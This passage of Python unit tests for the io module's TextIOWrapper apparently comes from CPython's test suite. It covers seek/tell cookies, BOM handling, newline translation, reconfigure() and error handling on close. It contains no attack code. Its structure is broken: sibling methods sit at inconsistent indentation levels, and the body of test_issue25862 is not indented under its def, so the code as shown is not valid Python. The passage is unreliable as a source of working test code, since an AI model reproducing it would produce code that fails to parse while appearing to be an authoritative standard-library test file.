        for enc in "ascii", "latin-1", "utf-8" :# , "utf-16-be", "utf-16-le":
            f = self.open(support.TESTFN, "w+", encoding=enc)
            f._CHUNK_SIZE = chunksize
            self.assertEqual(f.write("abc"), 3)
            f.close()
            f = self.open(support.TESTFN, "r+", encoding=enc)
            f._CHUNK_SIZE = chunksize
            self.assertEqual(f.tell(), 0)
            self.assertEqual(f.read(), "abc")
            cookie = f.tell()
            self.assertEqual(f.seek(0), 0)
            self.assertEqual(f.read(None), "abc")
            f.seek(0)
            self.assertEqual(f.read(2), "ab")
            self.assertEqual(f.read(1), "c")
            self.assertEqual(f.read(1), "")
            self.assertEqual(f.read(), "")
            # tell() at EOF matches the cookie captured earlier.
            self.assertEqual(f.tell(), cookie)
            self.assertEqual(f.seek(0), 0)
            self.assertEqual(f.seek(0, 2), cookie)
            self.assertEqual(f.write("def"), 3)
            self.assertEqual(f.seek(cookie), cookie)
            self.assertEqual(f.read(), "def")
            if enc.startswith("utf"):
                self.multi_line_test(f, enc)
            f.close()
def multi_line_test(self, f, enc):
    """Write lines of many sizes through *f*, then read them back checking
    that the tell() positions recorded while writing match those observed
    while reading."""
    f.seek(0)
    f.truncate()
    sample = "s\xff\u0fff\uffff"
    written = []
    for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
        # Cycle through the sample characters to build a line of this size.
        line = "".join(sample[k % len(sample)] for k in range(size)) + "\n"
        written.append((f.tell(), line))
        f.write(line)
    f.seek(0)
    read_back = []
    while True:
        pos = f.tell()
        line = f.readline()
        if not line:
            break
        read_back.append((pos, line))
    self.assertEqual(read_back, written)
def test_telling(self):
    """tell() tracks line boundaries, and is forbidden mid-iteration."""
    f = self.open(support.TESTFN, "w+", encoding="utf-8")
    p0 = f.tell()
    f.write("\xff\n")
    p1 = f.tell()
    f.write("\xff\n")
    p2 = f.tell()
    f.seek(0)
    self.assertEqual(f.tell(), p0)
    self.assertEqual(f.readline(), "\xff\n")
    self.assertEqual(f.tell(), p1)
    self.assertEqual(f.readline(), "\xff\n")
    self.assertEqual(f.tell(), p2)
    f.seek(0)
    for line in f:
        self.assertEqual(line, "\xff\n")
        # tell() inside a pending iteration raises.
        self.assertRaises(OSError, f.tell)
    self.assertEqual(f.tell(), p2)
    f.close()
def test_seeking(self):
    """Reading up to a chunk boundary keeps tell()/readline() consistent
    when a multibyte character straddles the boundary."""
    chunk_size = _default_chunk_size()
    prefix_size = chunk_size - 2
    u_prefix = "a" * prefix_size
    prefix = bytes(u_prefix.encode("utf-8"))
    # The ASCII prefix encodes one byte per char.
    self.assertEqual(len(u_prefix), len(prefix))
    u_suffix = "\u8888\n"
    suffix = bytes(u_suffix.encode("utf-8"))
    line = prefix + suffix
    with self.open(support.TESTFN, "wb") as f:
        f.write(line*2)
    with self.open(support.TESTFN, "r", encoding="utf-8") as f:
        s = f.read(prefix_size)
        self.assertEqual(s, str(prefix, "ascii"))
        self.assertEqual(f.tell(), prefix_size)
        self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
    """tell() after a readline over a split multibyte char must not fail."""
    # Regression test for a specific bug
    data = b'\xe0\xbf\xbf\n'
    with self.open(support.TESTFN, "wb") as f:
        f.write(data)
    with self.open(support.TESTFN, "r", encoding="utf-8") as f:
        f._CHUNK_SIZE  # Just test that it exists
        # Force the 3-byte character to be read across two chunks.
        f._CHUNK_SIZE = 2
        f.readline()
        f.tell()
def test_seek_and_tell(self):
    """Exhaustive seek/tell consistency with a stateful, buffering decoder."""
    #Test seek/tell using the StatefulIncrementalDecoder.
    # Make test faster by doing smaller seeks
    CHUNK_SIZE = 128

    def test_seek_and_tell_with_data(data, min_pos=0):
        """Tell/seek to various points within a data stream and ensure
        that the decoded data returned by read() is consistent."""
        f = self.open(support.TESTFN, 'wb')
        f.write(data)
        f.close()
        f = self.open(support.TESTFN, encoding='test_decoder')
        f._CHUNK_SIZE = CHUNK_SIZE
        decoded = f.read()
        f.close()

        for i in range(min_pos, len(decoded) + 1): # seek positions
            for j in [1, 5, len(decoded) - i]: # read lengths
                f = self.open(support.TESTFN, encoding='test_decoder')
                self.assertEqual(f.read(i), decoded[:i])
                cookie = f.tell()
                self.assertEqual(f.read(j), decoded[i:i + j])
                # Seeking back to the cookie must restore decoder state.
                f.seek(cookie)
                self.assertEqual(f.read(), decoded[i:])
                f.close()

    # Enable the test decoder.
    StatefulIncrementalDecoder.codecEnabled = 1

    # Run the tests.
    try:
        # Try each test case.
        for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
            test_seek_and_tell_with_data(input)

        # Position each test case so that it crosses a chunk boundary.
        for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
            offset = CHUNK_SIZE - len(input)//2
            prefix = b'.'*offset
            # Don't bother seeking into the prefix (takes too long).
            min_pos = offset*2
            test_seek_and_tell_with_data(prefix + input, min_pos)

    # Ensure our test decoder won't interfere with subsequent tests.
    finally:
        StatefulIncrementalDecoder.codecEnabled = 0
def test_encoded_writes(self):
    """The BOM is emitted only once across multiple writes (issue1753)."""
    data = "1234567890"
    for encoding in ("utf-16", "utf-16-le", "utf-16-be",
                     "utf-32", "utf-32-le", "utf-32-be"):
        buf = self.BytesIO()
        f = self.TextIOWrapper(buf, encoding=encoding)
        f.write(data)
        f.write(data)
        # Reading back twice must give the same doubled payload.
        for _ in range(2):
            f.seek(0)
            self.assertEqual(f.read(), data * 2)
        self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
    """read() fails when the buffer reports readable() == False."""
    class NotReadable(self.BytesIO):
        def readable(self):
            return False
    txt = self.TextIOWrapper(NotReadable())
    self.assertRaises(OSError, txt.read)
def test_read_one_by_one(self):
    """Single-character reads still translate '\\r\\n' to '\\n'."""
    txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
    chars = []
    while True:
        ch = txt.read(1)
        if not ch:
            break
        chars.append(ch)
    self.assertEqual("".join(chars), "AA\nBB")
def test_readlines(self):
    """readlines() honours an optional size hint."""
    txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
    all_lines = ["AA\n", "BB\n", "CC"]
    self.assertEqual(txt.readlines(), all_lines)
    txt.seek(0)
    self.assertEqual(txt.readlines(None), all_lines)
    txt.seek(0)
    # A hint of 5 stops after the line that crosses it.
    self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def test_read_by_chunk(self):
    """A '\\r\\n' pair straddling the 128-char chunk boundary is translated."""
    txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
    pieces = []
    while True:
        chunk = txt.read(128)
        if not chunk:
            break
        pieces.append(chunk)
    self.assertEqual("".join(pieces), "A" * 127 + "\nB")
def test_writelines(self):
    """writelines() concatenates its items with no separators added."""
    buf = self.BytesIO()
    txt = self.TextIOWrapper(buf)
    txt.writelines(['ab', 'cd', 'ef'])
    txt.flush()
    self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
    """writelines() accepts arbitrary sequence types such as UserList."""
    buf = self.BytesIO()
    txt = self.TextIOWrapper(buf)
    txt.writelines(UserList(['ab', 'cd', 'ef']))
    txt.flush()
    self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
    """writelines() rejects non-string items, None, and bytes."""
    txt = self.TextIOWrapper(self.BytesIO())
    for bad in ([1, 2, 3], None, b'abc'):
        self.assertRaises(TypeError, txt.writelines, bad)
def test_issue1395_1(self):
    """Newline normalization survives one-character reads."""
    txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")

    # read one char at a time
    reads = ""
    while True:
        c = txt.read(1)
        if not c:
            break
        reads += c
    self.assertEqual(reads, self.normalized)

def test_issue1395_2(self):
    """Newline normalization survives reads equal to the chunk size."""
    txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
    txt._CHUNK_SIZE = 4

    reads = ""
    while True:
        c = txt.read(4)
        if not c:
            break
        reads += c
    self.assertEqual(reads, self.normalized)

def test_issue1395_3(self):
    """Mixing read() and readline() with a tiny chunk size stays correct."""
    txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
    txt._CHUNK_SIZE = 4

    reads = txt.read(4)
    reads += txt.read(4)
    reads += txt.readline()
    reads += txt.readline()
    reads += txt.readline()
    self.assertEqual(reads, self.normalized)

def test_issue1395_4(self):
    """A partial read followed by read() returns the remaining text."""
    txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
    txt._CHUNK_SIZE = 4

    reads = txt.read(4)
    reads += txt.read()
    self.assertEqual(reads, self.normalized)

def test_issue1395_5(self):
    """seek() back to a tell() cookie resumes reading correctly."""
    txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
    txt._CHUNK_SIZE = 4

    reads = txt.read(4)
    pos = txt.tell()
    txt.seek(0)
    txt.seek(pos)
    self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
    """seekable() is forwarded from the underlying buffer."""
    buffer = self.BytesIO(self.testdata)
    txt = self.TextIOWrapper(buffer, encoding="ascii")
    self.assertEqual(txt.seekable(), buffer.seekable())
def test_append_bom(self):
    """Appending to a non-empty file must not write a second BOM."""
    # The BOM is not written again when appending to a non-empty file
    filename = support.TESTFN
    for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
        with self.open(filename, 'w', encoding=charset) as f:
            f.write('aaa')
            pos = f.tell()
        with self.open(filename, 'rb') as f:
            self.assertEqual(f.read(), 'aaa'.encode(charset))

        with self.open(filename, 'a', encoding=charset) as f:
            f.write('xxx')
        with self.open(filename, 'rb') as f:
            self.assertEqual(f.read(), 'aaaxxx'.encode(charset))

def test_seek_bom(self):
    """Seeking within a file opened 'r+' must not duplicate the BOM."""
    # Same test, but when seeking manually
    filename = support.TESTFN
    for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
        with self.open(filename, 'w', encoding=charset) as f:
            f.write('aaa')
            pos = f.tell()
        with self.open(filename, 'r+', encoding=charset) as f:
            f.seek(pos)
            f.write('zzz')
            # Overwriting at position 0 must preserve the existing BOM.
            f.seek(0)
            f.write('bbb')
        with self.open(filename, 'rb') as f:
            self.assertEqual(f.read(), 'bbbzzz'.encode(charset))

def test_seek_append_bom(self):
    """Seeking to start then end in append mode must not duplicate the BOM."""
    # Same test, but first seek to the start and then to the end
    filename = support.TESTFN
    for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
        with self.open(filename, 'w', encoding=charset) as f:
            f.write('aaa')
        with self.open(filename, 'a', encoding=charset) as f:
            f.seek(0)
            f.seek(0, self.SEEK_END)
            f.write('xxx')
        with self.open(filename, 'rb') as f:
            self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_errors_property(self):
    """errors defaults to "strict" and reflects the errors= argument."""
    for kwargs, expected in (({}, "strict"),
                             ({"errors": "replace"}, "replace")):
        with self.open(support.TESTFN, "w", **kwargs) as f:
            self.assertEqual(f.errors, expected)
@support.no_tracing
def test_threads_write(self):
    """Concurrent line-buffered writes must not duplicate data."""
    # Issue6750: concurrent writes could duplicate data
    event = threading.Event()
    with self.open(support.TESTFN, "w", buffering=1) as f:
        def run(n):
            text = "Thread%03d\n" % n
            # Wait so all threads start writing at (roughly) the same time.
            event.wait()
            f.write(text)
        threads = [threading.Thread(target=run, args=(x,))
                   for x in range(20)]
        with support.start_threads(threads, event.set):
            time.sleep(0.02)
    with self.open(support.TESTFN) as f:
        content = f.read()
        for n in range(20):
            # Each thread's line appears exactly once.
            self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
    """close() still closes the file even when flush() raises."""
    # Test that text file is closed despite failed flush
    # and that flush() is called before file closed.
    txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
    closed = []
    def bad_flush():
        # Record the closed-state at the moment flush() runs.
        closed[:] = [txt.closed, txt.buffer.closed]
        raise OSError()
    txt.flush = bad_flush
    self.assertRaises(OSError, txt.close) # exception not swallowed
    self.assertTrue(txt.closed)
    self.assertTrue(txt.buffer.closed)
    self.assertTrue(closed)      # flush() called
    self.assertFalse(closed[0])  # flush() called before file closed
    self.assertFalse(closed[1])
    txt.flush = lambda: None  # break reference loop

def test_close_error_on_close(self):
    """When both flush() and close() fail, the flush error is chained."""
    buffer = self.BytesIO(self.testdata)
    def bad_flush():
        raise OSError('flush')
    def bad_close():
        raise OSError('close')
    buffer.close = bad_close
    txt = self.TextIOWrapper(buffer, encoding="ascii")
    txt.flush = bad_flush
    with self.assertRaises(OSError) as err: # exception not swallowed
        txt.close()
    self.assertEqual(err.exception.args, ('close',))
    # The earlier flush error survives as __context__.
    self.assertIsInstance(err.exception.__context__, OSError)
    self.assertEqual(err.exception.__context__.args, ('flush',))
    self.assertFalse(txt.closed)

def test_nonnormalized_close_error_on_close(self):
    """Exception chaining also works for non-OSError failures (issue #21677)."""
    # Issue #21677
    buffer = self.BytesIO(self.testdata)
    def bad_flush():
        raise non_existing_flush
    def bad_close():
        raise non_existing_close
    buffer.close = bad_close
    txt = self.TextIOWrapper(buffer, encoding="ascii")
    txt.flush = bad_flush
    with self.assertRaises(NameError) as err: # exception not swallowed
        txt.close()
    self.assertIn('non_existing_close', str(err.exception))
    self.assertIsInstance(err.exception.__context__, NameError)
    self.assertIn('non_existing_flush', str(err.exception.__context__))
    self.assertFalse(txt.closed)
def test_multi_close(self):
    """close() is idempotent, but later operations still fail."""
    txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
    for _ in range(3):
        txt.close()
    self.assertRaises(ValueError, txt.flush)
def test_unseekable(self):
    """tell() and seek() raise UnsupportedOperation over unseekable raw IO."""
    txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata))
    for op, args in ((txt.tell, ()), (txt.seek, (0,))):
        self.assertRaises(self.UnsupportedOperation, op, *args)
def test_readonly_attributes(self):
    """The buffer attribute cannot be rebound after construction."""
    txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
    other = self.BytesIO(self.testdata)
    with self.assertRaises(AttributeError):
        txt.buffer = other
def test_rawio(self):
    """TextIOWrapper works directly over raw (unbuffered) I/O objects."""
    # Issue #12591: TextIOWrapper must work with raw I/O objects, so
    # that subprocess.Popen() can have the required unbuffered
    # semantics with universal_newlines=True.
    raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
    txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
    # Reads
    self.assertEqual(txt.read(4), 'abcd')
    self.assertEqual(txt.readline(), 'efghi\n')
    self.assertEqual(list(txt), ['jkl\n', 'opq\n'])

def test_rawio_write_through(self):
    """With write_through=True over raw I/O, writes need no flush()."""
    # Issue #12591: with write_through=True, writes don't need a flush
    raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
    txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n',
                             write_through=True)
    txt.write('1')
    txt.write('23\n4')
    txt.write('5')
    self.assertEqual(b''.join(raw._write_stack), b'123\n45')
def test_bufio_write_through(self):
    """write_through passes data to the buffer but does not flush it."""
    # Issue #21396: write_through=True doesn't force a flush()
    # on the underlying binary buffered object.
    flush_called, write_called = [], []
    class BufferedWriter(self.BufferedWriter):
        def flush(self, *args, **kwargs):
            flush_called.append(True)
            return super().flush(*args, **kwargs)
        def write(self, *args, **kwargs):
            write_called.append(True)
            return super().write(*args, **kwargs)

    rawio = self.BytesIO()
    data = b"a"
    bufio = BufferedWriter(rawio, len(data)*2)
    textio = self.TextIOWrapper(bufio, encoding='ascii',
                                write_through=True)
    # write to the buffered io but don't overflow the buffer
    text = data.decode('ascii')
    textio.write(text)

    # buffer.flush is not called with write_through=True
    self.assertFalse(flush_called)
    # buffer.write *is* called with write_through=True
    self.assertTrue(write_called)
    self.assertEqual(rawio.getvalue(), b"") # no flush

    write_called = [] # reset
    textio.write(text * 10) # total content is larger than bufio buffer
    self.assertTrue(write_called)
    self.assertEqual(rawio.getvalue(), data * 11) # all flushed
def test_reconfigure_write_through(self):
    """reconfigure(write_through=...) flushes and changes behaviour in place."""
    raw = self.MockRawIO([])
    t = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
    t.write('1')
    t.reconfigure(write_through=True)  # implied flush
    self.assertEqual(t.write_through, True)
    self.assertEqual(b''.join(raw._write_stack), b'1')
    t.write('23')
    self.assertEqual(b''.join(raw._write_stack), b'123')
    t.reconfigure(write_through=False)
    self.assertEqual(t.write_through, False)
    t.write('45')
    t.flush()
    self.assertEqual(b''.join(raw._write_stack), b'12345')
    # Keeping default value: reconfigure() and write_through=None
    # both leave the current setting unchanged.
    t.reconfigure()
    t.reconfigure(write_through=None)
    self.assertEqual(t.write_through, False)
    t.reconfigure(write_through=True)
    t.reconfigure()
    t.reconfigure(write_through=None)
    self.assertEqual(t.write_through, True)
def test_read_nonbytes(self):
    """A raw read() returning non-bytes raises TypeError instead of
    crashing (issue #17106)."""
    for operation in (lambda t: t.read(1),
                      lambda t: t.readline(),
                      lambda t: t.read()):
        t = self.TextIOWrapper(self.StringIO('a'))
        self.assertRaises(TypeError, operation, t)
def test_illegal_encoder(self):
    """An encoder returning a non-bytes value must not trip an assertion."""
    # Issue 31271: Calling write() while the return value of encoder's
    # encode() is invalid shouldn't cause an assertion failure.
    rot13 = codecs.lookup("rot13")
    # Temporarily pretend rot13 is a text encoding to get past the
    # constructor's early check.
    with support.swap_attr(rot13, '_is_text_encoding', True):
        t = io.TextIOWrapper(io.BytesIO(b'foo'), encoding="rot13")
    self.assertRaises(TypeError, t.write, 'bar')
    def test_illegal_decoder(self):
        """Reading through a decoder that misbehaves must raise TypeError,
        not crash the interpreter or raise SystemError."""
        # Issue #17106
        # Bypass the early encoding check added in issue 20404
        def _make_illegal_wrapper():
            # quopri is a bytes<->bytes codec; temporarily mark it as a
            # text encoding so TextIOWrapper accepts it.
            quopri = codecs.lookup("quopri")
            quopri._is_text_encoding = True
            try:
                t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'),
                                       newline='\n', encoding="quopri")
            finally:
                quopri._is_text_encoding = False
            return t
        # Crash when decoder returns non-string
        t = _make_illegal_wrapper()
        self.assertRaises(TypeError, t.read, 1)
        t = _make_illegal_wrapper()
        self.assertRaises(TypeError, t.readline)
        t = _make_illegal_wrapper()
        self.assertRaises(TypeError, t.read)
        # Issue 31243: calling read() while the return value of decoder's
        # getstate() is invalid should neither crash the interpreter nor
        # raise a SystemError.
        def _make_very_illegal_wrapper(getstate_ret_val):
            class BadDecoder:
                def getstate(self):
                    return getstate_ret_val
            def _get_bad_decoder(dummy):
                return BadDecoder()
            quopri = codecs.lookup("quopri")
            with support.swap_attr(quopri, 'incrementaldecoder',
                                   _get_bad_decoder):
                return _make_illegal_wrapper()
        t = _make_very_illegal_wrapper(42)
        self.assertRaises(TypeError, t.read, 42)
        t = _make_very_illegal_wrapper(())
        self.assertRaises(TypeError, t.read, 42)
        t = _make_very_illegal_wrapper((1, 2))
        self.assertRaises(TypeError, t.read, 42)
    def _check_create_at_shutdown(self, **kwargs):
        """Run a subprocess that creates a TextIOWrapper from a __del__
        during interpreter shutdown; return assert_python_ok's result.

        *kwargs* are forwarded to the TextIOWrapper constructor inside
        the child process.
        """
        # Issue #20037: creating a TextIOWrapper at shutdown
        # shouldn't crash the interpreter.
        iomod = self.io.__name__
        code = """if 1:
            import codecs
            import {iomod} as io
            # Avoid looking up codecs at shutdown
            codecs.lookup('utf-8')
            class C:
                def __init__(self):
                    self.buf = io.BytesIO()
                def __del__(self):
                    io.TextIOWrapper(self.buf, **{kwargs})
                    print("ok")
            c = C()
            """.format(iomod=iomod, kwargs=kwargs)
        return assert_python_ok("-c", code)
    @support.requires_type_collecting
    def test_create_at_shutdown_without_encoding(self):
        """Creating a TextIOWrapper at shutdown with default encoding must
        not crash; a clean RuntimeError about module state is tolerated."""
        rc, out, err = self._check_create_at_shutdown()
        if err:
            # Can error out with a RuntimeError if the module state
            # isn't found.
            self.assertIn(self.shutdown_error, err.decode())
        else:
            self.assertEqual("ok", out.decode().strip())
    @support.requires_type_collecting
    def test_create_at_shutdown_with_encoding(self):
        """With an explicit encoding (no codec lookup needed at shutdown)
        the child must succeed with no stderr output at all."""
        rc, out, err = self._check_create_at_shutdown(encoding='utf-8',
                                                      errors='strict')
        self.assertFalse(err)
        self.assertEqual("ok", out.decode().strip())
    def test_read_byteslike(self):
        """TextIOWrapper must accept byteslike (memoryview) results from
        the underlying stream's read()/read1()."""
        r = MemviewBytesIO(b'Just some random string\n')
        t = self.TextIOWrapper(r, 'utf-8')
        # TextIOWrapper will not read the full string, because
        # we truncate it to a multiple of the native int size
        # so that we can construct a more complex memoryview.
        bytes_val = _to_memoryview(r.getvalue()).tobytes()
        self.assertEqual(t.read(200), bytes_val.decode('utf-8'))
    def test_issue22849(self):
        """Repeatedly constructing TextIOWrapper on an object lacking
        tell() must not crash/leak; once tell() exists it succeeds."""
        class F(object):
            def readable(self): return True
            def writable(self): return True
            def seekable(self): return True
        # F has no tell(), so construction fails; it must fail cleanly
        # every time.
        for i in range(10):
            try:
                self.TextIOWrapper(F(), encoding='utf-8')
            except Exception:
                pass
        F.tell = lambda x: 0
        t = self.TextIOWrapper(F(), encoding='utf-8')
    def test_reconfigure_encoding_read(self):
        """Changing encoding or universal-newline mode after data has been
        read is unsupported and must raise UnsupportedOperation."""
        # latin1 -> utf8
        # (latin1 can decode utf-8 encoded string)
        data = 'abc\xe9\n'.encode('latin1') + 'd\xe9f\n'.encode('utf8')
        raw = self.BytesIO(data)
        txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
        self.assertEqual(txt.readline(), 'abc\xe9\n')
        with self.assertRaises(self.UnsupportedOperation):
            txt.reconfigure(encoding='utf-8')
        with self.assertRaises(self.UnsupportedOperation):
            txt.reconfigure(newline=None)
    def test_reconfigure_write_fromascii(self):
        """Switching encoders must drop any cached fast-path encodefunc."""
        # ascii has a specific encodefunc in the C implementation,
        # but utf-8-sig has not. Make sure that we get rid of the
        # cached encodefunc when we switch encoders.
        raw = self.BytesIO()
        txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
        txt.write('foo\n')
        txt.reconfigure(encoding='utf-8-sig')
        txt.write('\xe9\n')
        txt.flush()
        # '\xe9' is encoded by the new utf-8-sig encoder (no stale ascii path)
        self.assertEqual(raw.getvalue(), b'foo\n\xc3\xa9\n')
    def test_reconfigure_write(self):
        """reconfigure(encoding=...) flushes pending text with the old
        encoder and encodes subsequent writes with the new one."""
        # latin -> utf8
        raw = self.BytesIO()
        txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
        txt.write('abc\xe9\n')
        txt.reconfigure(encoding='utf-8')
        # the pending latin1 text was flushed by reconfigure()
        self.assertEqual(raw.getvalue(), b'abc\xe9\n')
        txt.write('d\xe9f\n')
        txt.flush()
        self.assertEqual(raw.getvalue(), b'abc\xe9\nd\xc3\xa9f\n')
        # ascii -> utf-8-sig: ensure that no BOM is written in the middle of
        # the file
        raw = self.BytesIO()
        txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
        txt.write('abc\n')
        txt.reconfigure(encoding='utf-8-sig')
        txt.write('d\xe9f\n')
        txt.flush()
        self.assertEqual(raw.getvalue(), b'abc\nd\xc3\xa9f\n')
    def test_reconfigure_write_non_seekable(self):
        """On a non-seekable stream the wrapper cannot know it is not at
        the start of the file, so utf-8-sig emits its BOM mid-stream."""
        raw = self.BytesIO()
        raw.seekable = lambda: False
        raw.seek = None
        txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
        txt.write('abc\n')
        txt.reconfigure(encoding='utf-8-sig')
        txt.write('d\xe9f\n')
        txt.flush()
        # If the raw stream is not seekable, there'll be a BOM
        self.assertEqual(raw.getvalue(),  b'abc\n\xef\xbb\xbfd\xc3\xa9f\n')
    def test_reconfigure_defaults(self):
        """None/omitted reconfigure() arguments keep current settings;
        changing encoding resets errors to 'strict'."""
        txt = self.TextIOWrapper(self.BytesIO(), 'ascii', 'replace', '\n')
        txt.reconfigure(encoding=None)
        self.assertEqual(txt.encoding, 'ascii')
        self.assertEqual(txt.errors, 'replace')
        txt.write('LF\n')
        txt.reconfigure(newline='\r\n')
        self.assertEqual(txt.encoding, 'ascii')
        self.assertEqual(txt.errors, 'replace')
        txt.reconfigure(errors='ignore')
        self.assertEqual(txt.encoding, 'ascii')
        self.assertEqual(txt.errors, 'ignore')
        txt.write('CRLF\n')
        txt.reconfigure(encoding='utf-8', newline=None)
        # an explicit new encoding resets the error handler to strict
        self.assertEqual(txt.errors, 'strict')
        txt.seek(0)
        self.assertEqual(txt.read(), 'LF\nCRLF\n')
        self.assertEqual(txt.detach().getvalue(), b'LF\nCRLF\r\n')
    def test_reconfigure_newline(self):
        """reconfigure(newline=...) changes newline translation for both
        subsequent reads and subsequent writes."""
        # --- reading: the new newline mode applies to the next readline ---
        raw = self.BytesIO(b'CR\rEOF')
        txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
        txt.reconfigure(newline=None)
        self.assertEqual(txt.readline(), 'CR\n')
        raw = self.BytesIO(b'CR\rEOF')
        txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
        txt.reconfigure(newline='')
        self.assertEqual(txt.readline(), 'CR\r')
        raw = self.BytesIO(b'CR\rLF\nEOF')
        txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
        txt.reconfigure(newline='\n')
        self.assertEqual(txt.readline(), 'CR\rLF\n')
        raw = self.BytesIO(b'LF\nCR\rEOF')
        txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
        txt.reconfigure(newline='\r')
        self.assertEqual(txt.readline(), 'LF\nCR\r')
        raw = self.BytesIO(b'CR\rCRLF\r\nEOF')
        txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
        txt.reconfigure(newline='\r\n')
        self.assertEqual(txt.readline(), 'CR\rCRLF\r\n')
        # --- writing: each '\n' is translated per the mode active at write ---
        txt = self.TextIOWrapper(self.BytesIO(), 'ascii', newline='\r')
        txt.reconfigure(newline=None)
        txt.write('linesep\n')
        txt.reconfigure(newline='')
        txt.write('LF\n')
        txt.reconfigure(newline='\n')
        txt.write('LF\n')
        txt.reconfigure(newline='\r')
        txt.write('CR\n')
        txt.reconfigure(newline='\r\n')
        txt.write('CRLF\n')
        expected = 'linesep' + os.linesep + 'LF\nLF\nCR\rCRLF\r\n'
        self.assertEqual(txt.detach().getvalue().decode('ascii'), expected)
def test_issue25862(self):
# Assertion failures occurred in tell() after read() and write().
t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
t.read(1)
t.read()
t.tell()
t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
t.read(1)
t.write('x')
t.tell()
class MemviewBytesIO(io.BytesIO):
    """A BytesIO whose read methods hand back non-trivial memoryviews
    instead of bytes objects."""

    def read(self, len_):
        data = super().read(len_)
        return _to_memoryview(data)

    def read1(self, len_):
        data = super().read1(len_)
        return _to_memoryview(data)
def _to_memoryview(buf):
    """Convert bytes-object *buf* to a non-trivial memoryview.

    The bytes are reinterpreted as an array of native ints, so any tail
    of *buf* that does not fill a whole int is dropped.
    """
    ints = array.array('i')
    usable = len(buf) - len(buf) % ints.itemsize
    ints.frombytes(buf[:usable])
    return memoryview(ints)
class CTextIOWrapperTest(TextIOWrapperTest):
    """TextIOWrapper tests bound to the C implementation (_io)."""
    io = io
    # expected stderr fragment for the shutdown-creation tests
    shutdown_error = "RuntimeError: could not find io module state"

    def test_initialization(self):
        """Re-running __init__ with bad args must poison the object, and
        an uninitialized instance must not crash repr()."""
        r = self.BytesIO(b"\xc3\xa9\n\n")
        b = self.BufferedReader(r, 1000)
        t = self.TextIOWrapper(b)
        self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
        self.assertRaises(ValueError, t.read)
        t = self.TextIOWrapper.__new__(self.TextIOWrapper)
        self.assertRaises(Exception, repr, t)

    def test_garbage_collection(self):
        # C TextIOWrapper objects are collected, and collecting them flushes
        # all data to disk.
        # The Python version has __del__, so it ends in gc.garbage instead.
        with support.check_warnings(('', ResourceWarning)):
            rawio = io.FileIO(support.TESTFN, "wb")
            b = self.BufferedWriter(rawio)
            t = self.TextIOWrapper(b, encoding="ascii")
            t.write("456def")
            t.x = t  # self-reference, so collection needs the GC
            wr = weakref.ref(t)
            del t
            support.gc_collect()
        self.assertIsNone(wr(), wr)
        with self.open(support.TESTFN, "rb") as f:
            self.assertEqual(f.read(), b"456def")

    def test_rwpair_cleared_before_textio(self):
        # Issue 13070: TextIOWrapper's finalization would crash when called
        # after the reference to the underlying BufferedRWPair's writer got
        # cleared by the GC.
        for i in range(1000):
            b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
            t1 = self.TextIOWrapper(b1, encoding="ascii")
            b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
            t2 = self.TextIOWrapper(b2, encoding="ascii")
            # circular references
            t1.buddy = t2
            t2.buddy = t1
        support.gc_collect()

    def test_del__CHUNK_SIZE_SystemError(self):
        """Deleting _CHUNK_SIZE must raise AttributeError, not SystemError."""
        t = self.TextIOWrapper(self.BytesIO(), encoding='ascii')
        with self.assertRaises(AttributeError):
            del t._CHUNK_SIZE
class PyTextIOWrapperTest(TextIOWrapperTest):
    """TextIOWrapper tests bound to the pure-Python implementation (_pyio)."""
    io = pyio
    # expected stderr fragment for the shutdown-creation tests
    shutdown_error = "LookupError: unknown encoding: ascii"
class IncrementalNewlineDecoderTest(unittest.TestCase):
    """Tests for io.IncrementalNewlineDecoder (universal newlines).

    self.IncrementalNewlineDecoder is injected per C/Py subclass by
    load_tests().
    """

